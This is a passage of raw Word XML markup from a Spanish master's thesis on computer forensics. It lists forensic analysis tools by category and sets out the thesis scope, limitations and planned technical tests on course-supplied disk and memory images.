    <w:p w14:paraId="2ABBF28C" w14:textId="6693A6EF" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Volatility</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Reconstrucción y análisis de memoria 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DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252FA393" w14:textId="2165B474" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26" w:rsidP="00DB5F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB5F26">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Herramientas para el análisis de discos duros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA305CF" w14:textId="3089E5F3" w:rsidR="00DB5F26" w:rsidRPr="005A16DE" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>AccessData Forensic ToolKit (FTK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C22B403" w14:textId="42AF437A" w:rsidR="00DB5F26" w:rsidRPr="005A16DE" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Guidance Software EnCase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A609A72" w14:textId="7A364A49" w:rsidR="00DB5F26" w:rsidRPr="005A16DE" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kit Electrónico de Transferencia de datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6D16B1" w14:textId="675067CC" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26" w:rsidP="00DB5F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Herramientas para el análisis de correos electrónicos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0954C1D1" w14:textId="3C31F76A" w:rsidR="00DB5F26" w:rsidRPr="005A16DE" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AccessData Forensic ToolKit (FTK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E603CF" w14:textId="713F9610" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26" w:rsidP="00DB5F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Herramientas para el análisis de dispositivos móviles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A7C41C" w14:textId="6D53AFE0" w:rsidR="00DB5F26" w:rsidRPr="005A16DE" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cellebrite UFED Touch 2, Physical Analyzer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B4435" w14:textId="09D71BC1" w:rsidR="00DB5F26" w:rsidRPr="005A16DE" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AccessData Mobile Phone Examiner Plus (MPE+).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7020301B" w14:textId="5BDDE33E" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26" w:rsidP="00DB5F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Herramientas para el análisis de redes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1063E2D0" w14:textId="2E86C1E7" w:rsidR="00DB5F26" w:rsidRPr="005A16DE" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>E-Detective - Decision Computer Group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63010E8A" w14:textId="0AEAFF96" w:rsidR="00DB5F26" w:rsidRPr="005A16DE" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SilentRunner - AccessData.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A97C130" w14:textId="42EFCD92" w:rsidR="00DB5F26" w:rsidRPr="005A16DE" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NetworkMiner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADB2E58" w14:textId="79BF2CC4" w:rsidR="00DB5F26" w:rsidRPr="005A16DE" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nerviness Investigator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE418D6" w14:textId="2F1DF797" w:rsidR="00DB5F26" w:rsidRPr="00DB5F26" w:rsidRDefault="00DB5F26" w:rsidP="00DB5F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Herramientas para filtrar y monitorear el tráfico de una red tanto interna como a internet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66023050" w14:textId="6D608696" w:rsidR="00DB5F26" w:rsidRPr="005A16DE" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tcpdump.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CCB06D" w14:textId="77777777" w:rsidR="00C356F1" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A16DE">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SilentRunner </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A100E" w14:textId="4A38550E" w:rsidR="005A16DE" w:rsidRPr="004F7594" w:rsidRDefault="00DB5F26">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7594">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WireShark.</w:t>
      </w:r>
      <w:r w:rsidR="005A16DE" w:rsidRPr="004F7594">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC4DD91" w14:textId="022B21AD" w:rsidR="000D10AB" w:rsidRDefault="005A16DE" w:rsidP="005A16DE">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc155782504"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005A16DE">
        <w:t>Extremos del análisis y previsión de pruebas técnicas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="6DE97F75" w14:textId="77777777" w:rsidR="00DD4F6C" w:rsidRDefault="00DD4F6C" w:rsidP="00DD4F6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E4B2CC" w14:textId="244977FC" w:rsidR="000D10AB" w:rsidRDefault="00DD4F6C" w:rsidP="005A16DE">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc155782505"/>
      <w:r w:rsidRPr="00DD4F6C">
        <w:t>2.1.</w:t>
      </w:r>
      <w:r w:rsidR="00B432EF">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD4F6C">
        <w:t>Propuesta de extremos.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="418B6B59" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03FBB447" w14:textId="77777777" w:rsidR="004F7594" w:rsidRPr="004F7594" w:rsidRDefault="004F7594" w:rsidP="004F7594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F7594">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La presente investigación tiene como propósito fundamental el establecimiento de un marco metodológico para el análisis forense de ordenadores, específicamente orientado hacia la identificación, recolección y análisis de evidencias digitales que puedan ser presentadas en un entorno judicial. A continuación, se delinean los extremos de esta propuesta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2770B53A" w14:textId="420FDD43" w:rsidR="004F7594" w:rsidRPr="002F2988" w:rsidRDefault="002F2988" w:rsidP="004F7594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2988">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Objeto de estudio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A15DB7" w14:textId="4B69BC97" w:rsidR="004F7594" w:rsidRPr="00B432EF" w:rsidRDefault="004F7594">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La investigación se centrará exclusivamente en el análisis forense del material facilitado para el desarrollo de la asignatura por parte del profesorado de la asignatura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9524E7" w14:textId="24D46593" w:rsidR="004F7594" w:rsidRPr="009440E4" w:rsidRDefault="004F7594">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se </w:t>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>realizará una breve indicación sobre la aplicación utilizada con cada uno de los objetivos del presente TFM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C923EC4" w14:textId="3C5A31BD" w:rsidR="004F7594" w:rsidRPr="009440E4" w:rsidRDefault="002F2988" w:rsidP="004F7594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Alcance metodológico:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496218EA" w14:textId="1F01EE3F" w:rsidR="004F7594" w:rsidRPr="009440E4" w:rsidRDefault="004F7594">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La validación de la integridad</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Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida."</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 xml:space="preserve"> de la evidencia se hará mediante el uso de funciones hash</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Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</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 xml:space="preserve"> estándar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5362A0F9" w14:textId="53C96F7B" w:rsidR="004F7594" w:rsidRPr="009440E4" w:rsidRDefault="004F7594">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se examinarán las metodologías para el análisis de la memoria volátil y no volátil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188746FD" w14:textId="3098044D" w:rsidR="004F7594" w:rsidRPr="009440E4" w:rsidRDefault="002F2988" w:rsidP="004F7594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Limitaciones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B88A2" w14:textId="541AF1D2" w:rsidR="004F7594" w:rsidRPr="009440E4" w:rsidRDefault="004F7594">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>La validación de la integridad</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Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida."</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 xml:space="preserve"> de la evidencia se hará mediante el uso de funciones hash</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Hash: Función criptográfica que convierte cualquier bloque de datos en una cadena de longitud fija, que actúa como un "huella digital" de los datos."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> estándar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C58B3D" w14:textId="2E4AC3B2" w:rsidR="004F7594" w:rsidRPr="00B432EF" w:rsidRDefault="004F7594">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009440E4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se examinarán las metodologías para </w:t>
      </w:r>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>el análisis de la memoria volátil y no volátil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD8D607" w14:textId="2C31E1C3" w:rsidR="004F7594" w:rsidRPr="002F2988" w:rsidRDefault="002F2988" w:rsidP="004F7594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2988">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exclusiones:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10ED73FF" w14:textId="33415113" w:rsidR="000D10AB" w:rsidRPr="00B432EF" w:rsidRDefault="004F7594">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No se utilizará material de análisis que no sea el proporcionado por la asignatura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5133DF02" w14:textId="77777777" w:rsidR="000D10AB" w:rsidRDefault="000D10AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD177E6" w14:textId="00BB3DA5" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF" w:rsidP="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc155782506"/>
      <w:r w:rsidRPr="00B432EF">
        <w:t>2.2.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B432EF">
        <w:t>Previsión de pruebas técnicas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="11F17492" w14:textId="77777777" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF" w:rsidP="00B432EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7711B97C" w14:textId="4E4AF5F1" w:rsidR="00B432EF" w:rsidRPr="002F2988" w:rsidRDefault="002F2988" w:rsidP="00B432EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2988">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pruebas técnicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4007412B" w14:textId="62B1EE60" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El propósito de estas pruebas técnicas es lo indicado en el apartado de problema a resolver del presente Trabajo de fin de master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715BE8C2" w14:textId="4463749D" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Solventar las necesidades del gerente de la empresa mediante el análisis forense del disco duro y la captura de memoria de un ordenador personal, en un caso real con un sistema virtualizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFD4805" w14:textId="468AC3B8" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Posible vinculación con una presunta conducta delictiva real.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C0D73D" w14:textId="7F192708" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B432EF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Importancia de las pruebas para validar la hipótesis y objetivos de investigación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090DF689" w14:textId="09AE69F8" w:rsidR="00B432EF" w:rsidRPr="00B432EF" w:rsidRDefault="00B432EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
